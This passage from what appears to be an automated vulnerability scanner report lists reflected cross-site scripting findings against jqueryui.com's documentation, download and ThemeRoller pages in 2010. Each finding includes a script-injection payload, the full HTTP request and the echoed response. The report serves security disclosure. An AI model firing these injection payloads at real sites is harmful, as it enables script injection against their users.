Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27159

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Upgrade_Guideb3a55</script><script>alert(1)</script>a48fc76bd21</title>
   
   <meta name="keywords" content="
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Upgrade_Guideb3a55</script><script>alert(1)</script>a48fc76bd21]").addClass("selected");
</script>
...[SNIP]...

1.69. http://jqueryui.com/docs/Upgrade_Guide [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /docs/Upgrade_Guide

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload acebc</title><script>alert(1)</script>d6cc8634230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Upgrade_Guideacebc</title><script>alert(1)</script>d6cc8634230 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27156

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Upgrade_Guideacebc</title><script>alert(1)</script>d6cc8634230</title>
   
   <meta name="keywords" content="j
...[SNIP]...

1.70. http://jqueryui.com/download [themeParams parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /download

Issue detail

The value of the themeParams request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11a61"><script>alert(1)</script>a61e63b8ca1 was submitted in the themeParams parameter. This input was echoed as 11a61\"><script>alert(1)</script>a61e63b8ca1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download?themeParams=%3Fctl%3Dthemeroller11a61"><script>alert(1)</script>a61e63b8ca1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 67839

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Configure your download</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /
...[SNIP]...
<option value="?ctl=themeroller11a61\"><script>alert(1)</script>a61e63b8ca1" selected="selected">
...[SNIP]...

1.71. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is enclosed in double quotation marks; the response excerpt shows the complete ThemeRoller query string being rebuilt, parameter by parameter, inside that attribute, and the ThemeRoller findings that follow reach the same reflection point through the other parameters of that query string. The payload b9ef1"><script>alert(1)</script>786f28ee864 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response, neither URL-encoded nor HTML-encoded, so the double quote ends the attribute value and the > closes the tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9b9ef1"><script>alert(1)</script>786f28ee864&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9b9ef1"><script>alert(1)</script>786f28ee864&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

1.72. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 856ba"><script>alert(1)</script>7e0ede96139 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd856ba"><script>alert(1)</script>7e0ede96139&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd856ba"><script>alert(1)</script>7e0ede96139&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85
...[SNIP]...

1.73. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46f4"><script>alert(1)</script>78f02d202ae was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffce46f4"><script>alert(1)</script>78f02d202ae&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffce46f4"><script>alert(1)</script>78f02d202ae&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

1.74. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83359"><script>alert(1)</script>3f46f89bf75 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83359"><script>alert(1)</script>3f46f89bf75&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83359"><script>alert(1)</script>3f46f89bf75&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

1.75. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the href attribute (enclosed in double quotation marks) of the ThemeRoller stylesheet <link>, which points at /themeroller/css/parseTheme.css.php with the full theme query string appended; the response excerpt below shows the opening of that attribute. The payload bfa0a"><script>alert(1)</script>e0141161bf4 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9cccbfa0a"><script>alert(1)</script>e0141161bf4&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9cccbfa0a"><script>alert(1)</script>e0141161bf4&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100
...[SNIP]...

1.76. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af7c6"><script>alert(1)</script>598ca42c4f5 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88af7c6"><script>alert(1)</script>598ca42c4f5&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88af7c6"><script>alert(1)</script>598ca42c4f5&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&bo
...[SNIP]...

1.77. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b6e"><script>alert(1)</script>26a180bd0fb was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f547b6e"><script>alert(1)</script>26a180bd0fb&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f547b6e"><script>alert(1)</script>26a180bd0fb&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorA
...[SNIP]...

1.78. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d15a0"><script>alert(1)</script>217cbbbdb46 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad15a0"><script>alert(1)</script>217cbbbdb46&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
